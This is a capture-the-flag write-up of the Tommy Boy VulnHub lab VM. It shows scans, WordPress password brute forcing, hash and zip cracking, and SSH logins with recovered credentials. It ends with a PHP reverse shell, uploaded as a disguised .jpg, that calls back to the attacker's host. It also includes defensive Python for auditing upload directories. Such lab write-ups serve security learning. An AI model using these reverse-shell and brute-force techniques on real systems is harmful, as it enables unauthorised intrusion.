This was one of my favorite VM's seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.
The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."
Sounds simple enough, let's see what it had to take to pwn this box!
Per my usual strategy, I kick off an nmap scan against the entire subnet that is on my VirtualBox interface:
root@localhost:~/VM/tommyboy# nmap 192.168.56.0/24

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 16:59 CDT
Nmap scan report for 192.168.56.100
Host is up (0.000057s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8008/tcp open  http
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds
root@localhost:~/VM/tommyboy#
Looks like 192.168.56.101 is the host machine! I see right away that there are 3 ports running, but let's make sure that there's nothing else hidden. I run nmap again, this time against all ports:
root@localhost:~/VM/tommyboy# nmap -p- 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:01 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
root@localhost:~/VM/tommyboy#
Ah-ha! Sneaky sneaky. Appears that another port has been unveiled: 65534. I will make note of this for future research. I still would like more information about this host, so I run nmap again against these 4 ports and add a few more switches in nmap:
root@localhost:~/VM/tommyboy# nmap -p22,80,8008,65534 -sV -A 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:03 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00021s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
root@localhost:~/VM/tommyboy#
Okay great. Looks like we have something to work with now. Right away, I see that there's "flag-numero-uno.txt" as an entry in robots.txt. I grab this flag first and take note of other headers and directories listed on port 80 and 8008:
Flag 1 captured! I keep note of the Flag data:
Flag1 data: B34rcl4ws
Great! Flag 1 is down. Let's keep looking around.
After more enumeration, I open up the source of the homepage. As suspected, there are some comments between Nick and Richard:
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
Awesome! I check out the video and see that we're being pointed to prehistoric forest.
I navigate to the page and I'm presented with the Callahan Employee Blog:
I start reading some of the blog posts and find the second flag! It's a comment by Michelle Michelle on the "Announcing the Callahan internal company blog!" post:
I navigate to the following directory and pick up the second flag:
http://192.168.56.101/prehistoricforest/thisisthesecondflagyayyou.txt
Sweet! Flag 2 has been found. I add this to my list:
Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
With the second flag under my belt, there still is a lot of work to do. My next step is to enumerate more on this WordPress site. I use wpscan to collect a list of users:
root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --enumerate u
Wonderful! We have 4 usernames to work with. Let's see if we can get lucky and brute force some of these passwords.
I tried against all 4 usernames and finally had a password crack with the username "tom":
root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --wordlist ~/tools/rockyou.txt --username tom
After using wpscan, we were able to extract the password for the following user:
username: tom
password: tomtom1
Let's try logging in with our newly found username and password:
And we're in! Time to start navigating around.
Now, I was able to find some great information while logged in as the admin on WordPress; however, most of the data collected will be used later in this VM.
I realize that I need to access this password protected post if I want to go any further. Looking back at the conversation between Richard and Tom Jr under the post "Son of A!", Richard tells Tom Jr to look at the picture in the directory /richard to jog his memory.
Seeing that this is a photo, I decide that there may be some steganography involved. So, I download the picture and run exiftool against it.
root@localhost:~/VM/tommyboy# exiftool shockedrichard.jpg
ExifTool Version Number         : 10.15
File Name                       : [...snippet...]
                                  Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : [...snippet...]
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6
root@localhost:~/VM/tommyboy#
Well what have we here? I see a User Comment with the following string:
ce154b5a8e59c89732bc25d6a2e6b90b
This looks like an md5 hash to me. So I take it over to HashKiller and run the md5 hash through. It finds a match and the hash was generated from the word "spanky".
By typing in spanky, we are able to view the Protected Message on the WordPress Site.
Looking at the message, Nick was the IT guy and he has now left the company. Luckily for us, he gave the following information to Richard:
You guys are all hopeless sheep :-/

The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.

IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.

Warning: Big Tom always forgets his account password.

Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Okay, first things first, I remember when scanning all ports, there was an unknown service under port 65534. This must be the FTP service that Nick is referencing. So, I wait until the top of the hour and the FTP service is up and running again.
I access the FTP service utilizing the following "easy to guess" passwords for nickburns:
username: nickburns
password: nickburns
Once logged into the FTP share, I see a file called readme.txt. I download the file to my local host and cat its contents:
root@localhost:~/VM/tommyboy# cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine from a flame thrower!

Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL. I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted .zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what? He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck! LOL.

-Nick
root@localhost:~/VM/tommyboy#
Okay, so it looks like there's a subfolder called "NickIzL33t" on the server. I figure that's what port 8008 is being used for. I navigate to the following page and I'm presented with this:
http://192.168.56.101:8008/NickIzL33t
So, this part actually hung me up for a bit. After reading and re-reading what was said, it dawns on me that Nick made a few references that were very important. He drops hints like "phone" and "Steve Jobs". There must be some way I can make it look like I'm coming from an Apple/iPhone device. Doing some research, there is a setting within BurpSuite that allows you to change your User-Agent to emulate an iOS device!
As shown above, under Proxy > Options > Match and Replace, there's a way to match the User-Agent and Replace with a regex emulating iOS.
I then navigate to the page again after modifying the settings and I'm presented with a new page:
Nick then mentions that you need to know the EXACT name of the .html to break into the fortress. So I then kick off Dirbuster and edit the following settings:
- User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
- Change directory to start with NickIzL33t
- Update extension from php to html
- Utilize the rockyou.txt wordlist
With the switches set, I find the following page:
http://192.168.56.101:8008/NickIzL33t/fallon1.html
Woot! I see a link to the third flag! I navigate to the following address to capture the flag:
http://192.168.56.101:8008/NickIzL33t/flagtres.txt
THREE OF 5 FLAGS - you're awesome sauce. Flag data: TinyHead
Just like the file says, I've captured 3 of the 5 flags. Here's my current list of flags:
Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
I'm over halfway there, it's time to keep moving. I read the contents of hint.txt:
Okay, looks like it's time to generate a wordlist to meet all these requirements. I use crunch to accomplish this task. I use the following to generate my password list:
root@localhost:~/VM/tommyboy# crunch 13 13 -t bev,%%@@^1995 -o crunch.txt
Now that my wordlist has been generated, I download Big Tom's encrypted pw backups file called "t0msp4ssw0rdz.zip".
I utilize fcrackzip to perform brute forcing against the password protected zip file:
root@localhost:~/VM/tommyboy# fcrackzip -D -p crunch.txt -u -v t0msp4ssw0rdz.zip
Awesome! The password used to protect this zip file was:
password: bevH00tr$1995
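The crunch template above encodes the constraints from the hint sheet. As an added example (not code from the original write-up), the Python below reproduces the -t placeholder semantics to confirm that the recovered password fits the template and to quantify how much the hint shrinks the keyspace compared with an unconstrained 13-character password. The symbol set used for ^ is an assumption standing in for crunch's default special-character list.

```python
import math
import string

# Placeholder classes as crunch's -t option defines them:
#   ,  uppercase   %  digit   @  lowercase   ^  symbol
# SYMBOLS is an assumption standing in for crunch's default
# special-character set; the exact set only changes the count slightly.
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/"
CLASSES = {
    ",": string.ascii_uppercase,
    "%": string.digits,
    "@": string.ascii_lowercase,
    "^": SYMBOLS,
}
PRINTABLE = 94  # printable ASCII, for the "no hint" comparison

TEMPLATE = "bev,%%@@^1995"  # the -t argument used in the write-up


def keyspace(template: str) -> int:
    """Number of candidates crunch emits for a -t template: the product
    of each placeholder's class size; literal characters contribute 1."""
    return math.prod(len(CLASSES[c]) if c in CLASSES else 1 for c in template)


def matches(template: str, candidate: str) -> bool:
    """True if candidate is one of the strings the template expands to."""
    if len(candidate) != len(template):
        return False
    for t, c in zip(template, candidate):
        allowed = CLASSES.get(t)
        if allowed is None:      # literal position: must match exactly
            if c != t:
                return False
        elif c not in allowed:   # placeholder position: must be in class
            return False
    return True


def hint_leakage_bits(template: str) -> float:
    """Entropy lost to the hint: bits for a random printable-ASCII
    password of the same length minus the bits left once the hint is known."""
    unconstrained = len(template) * math.log2(PRINTABLE)
    return unconstrained - math.log2(keyspace(template))


if __name__ == "__main__":
    n = keyspace(TEMPLATE)
    print(f"{TEMPLATE}: {n:,} candidates (~{math.log2(n):.1f} bits)")
    print(f"hint leaked ~{hint_leakage_bits(TEMPLATE):.1f} bits")
    print("bevH00tr$1995 fits:", matches(TEMPLATE, "bevH00tr$1995"))
```

With the hint known, the search space is roughly 56 million candidates (about 26 bits), which is why a single fcrackzip run finishes quickly.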
I unzip the file and read the contents of passwords.txt:
root@localhost:~/VM/tommyboy# cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are. However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
root@localhost:~/VM/tommyboy#
Okay, so the Callahan Auto Server username and password appear to be the credentials needed to SSH into the server. Remembering what I found on the WordPress site earlier after logging in as admin, there was a draft created by Big Tom saying the following:
If my guess is correct, I should be able to add 1938!! to the end of fatguyinalittlecoat to SSH into the server as bigtommysenior:
username: bigtommysenior
password: fatguyinalittlecoat1938!!
Success!
I take a look around in bigtommysenior's home directory and there are 3 files listed:
bigtommysenior@CallahanAutoSrv01:~$ ls -l
total 12
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul  7 17:59 LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$
What have we here? Is that the 4th flag?!
Why yes it is! Now I have 4 out of 5 flags:
Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton
Alright, it's time to find this 5th flag. But first, I need to restore the Callahan Web Page by copying over callahanbak.bak to index.html located in /var/www/html:
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
I navigate to the home page:
Awesome! The webpage has been restored! However, this is not the end. I still need flag 5!
I take the advice from flag 4 and go to the root of the server and look for /5.txt:
bigtommysenior@CallahanAutoSrv01:~$ cd /
bigtommysenior@CallahanAutoSrv01:/$ ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 .
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Jul  6 08:32 bin
drwxr-xr-x   4 root     root     1.0K Jul 14 13:38 boot
drwxr-xr-x  20 root     root     4.1K Aug 11 13:53 dev
[...snippet...]
bigtommysenior@CallahanAutoSrv01:/$
Interesting. I see 5.txt, however, it's owned by www-data and only that user or members of the www-data group can actually read its contents. There must be a way to switch to this user, or better yet, maybe there's a way to run a process that is owned by www-data and get the file that way...
After some long hard thinking, I realize that since I'm on the server, maybe it's a good idea to see if there was anything else hidden within "nicks" directory:
bigtommysenior@CallahanAutoSrv01:/$ cd /var/
bigtommysenior@CallahanAutoSrv01:/var$ ls
backups  crash  local  log   opt   snap   thatsg0nnaleaveamark  www
cache    lib    lock   mail  run   spool  tmp
bigtommysenior@CallahanAutoSrv01:/var$ cd thatsg0nnaleaveamark/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ ls
index.html  NickIzL33t
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ cd NickIzL33t/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$ ls
fallon1.html  flagtres.txt  hint.txt  index.html  P4TCH_4D4MS  t0msp4ssw0rdz.zip
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$
Ah-ha! There's a directory called P4TCH_4D4MS within NickIzL33t. I navigate to that directory through the browser:
http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/
Interesting. So there's an option to upload an image to the server.
Also, when I navigate to the P4TCH_4D4MS directory on the server, the uploads directory is world-writable!
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 17 08:19 ..
-rw-r--r-- 1 root     root     1.6K Jul 15 12:25 backupload.php
-rw-r--r-- 1 root     root      206 Jul 15 12:25 .htaccess
-rw-r--r-- 1 root     root      280 Jul 15 12:03 index.html
-rw-r--r-- 1 root     root     1.6K Jul 15 12:47 upload.php
drwxrwxrwx 2 www-data www-data 4.0K Aug 11 20:07 uploads
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$
I decide that if I want to read the contents of the 5th flag as www-data, then I'll want to upload a reverse shell to the server and catch the shell running as www-data. In order to do this I first need to upload my shell as a .jpg, change the file on the server to a .php, and then navigate to the directory it's located in and catch the shell! Let's see how this was done:
root@localhost:~/VM/tommyboy# cat geoda.php.jpg
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
[...snippet...]

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1';  // CHANGE THIS
$port = 443;           // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

[...snippet...]

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>
root@localhost:~/VM/tommyboy#
As shown above, I have my reverse shell geoda.php.jpg and I upload it to the server.
I then navigate to the server and copy the file and save it as a .php:
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cp geoda.php.jpg geoda.php
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
geoda.php  geoda.php.jpg  index.html
Now that my reverse shell is in place, I fire up netcat on port 443 and navigate to where my shell is located:
http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/uploads/geoda.php
Yes! It worked. I then navigate to the root directory and cat flag 5:
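The upload step worked because the handler trusted the .jpg suffix and the uploads directory was world-writable, so a file accepted as an image could be renamed into a script from the SSH session. As an added example (not code from the write-up or the VM), this Python audit walks an uploads tree and flags exactly those conditions: world-writable directories, double extensions such as .php.jpg, script extensions, image-named files that do not begin with image magic bytes, and any file carrying a PHP open tag. The sample tree it checks is constructed in a temporary directory.

```python
import os
import stat
import tempfile

IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")


def audit_upload_dir(root: str) -> list:
    """Return (relative path, reason) findings for an uploads tree."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # drwxrwxrwx on uploads is what let a .jpg be copied to .php
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((rel_dir, "world-writable directory"))
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            lower = name.lower()
            inner_exts = ["." + p for p in lower.split(".")[1:-1]]
            # geoda.php.jpg: a script extension hidden before the last one
            if any(e in SCRIPT_EXTS for e in inner_exts):
                findings.append((rel, "double extension hides script"))
            if lower.endswith(SCRIPT_EXTS):
                findings.append((rel, "executable script in uploads"))
            with open(os.path.join(dirpath, name), "rb") as fh:
                head = fh.read(512)
            if b"<?php" in head:
                findings.append((rel, "PHP open tag in file body"))
            elif lower.endswith(IMAGE_EXTS) and not head.startswith(IMAGE_MAGIC):
                findings.append((rel, "image extension but no image magic"))
    return findings


def build_sample_tree() -> str:
    """Constructed sample mirroring the write-up's uploads listing; these
    are throwaway files in a temp dir, not data from the VM."""
    root = tempfile.mkdtemp(prefix="uploads-")
    os.chmod(root, 0o777)  # drwxrwxrwx, as in the ls -lah output above
    script = b"<?php // stand-in for the uploaded reverse shell ?>\n"
    samples = {
        "index.html": b"<html></html>\n",
        "cat.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,  # genuine JPEG header
        "geoda.php.jpg": script,   # what the upload form accepted
        "geoda.php": script,       # the copy made over SSH
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, reason in sorted(audit_upload_dir(build_sample_tree())):
        print(f"{path}: {reason}")
```

Run against a real uploads directory, a hit on any of these findings is the signal to tighten the handler's content checks and drop the world-writable bit.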
Now I have all 5 flags! I then "blob it into one big chunk":
Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton
Flag5 data: Buttcrack

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
I then go back to bigtommysenior via SSH and locate the LOOT.ZIP file, unzip it with the newly generated password, and cat the final text file:
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ cd ~
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak  el-flag-numero-quatro.txt  LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
Archive:  LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
  inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME. YOU SAW. YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security
bigtommysenior@CallahanAutoSrv01:~$
Whew! Success!
This was an excellent VM. I was able to use a lot of tools that I've either never used before, tools that I've used but didn't know their full capabilities, or tools that I haven't used in a while and needed to freshen up on.
I'd like to thank Brian Johnson for creating such a wonderful VM and of course VulnHub for hosting this for all of us to learn on.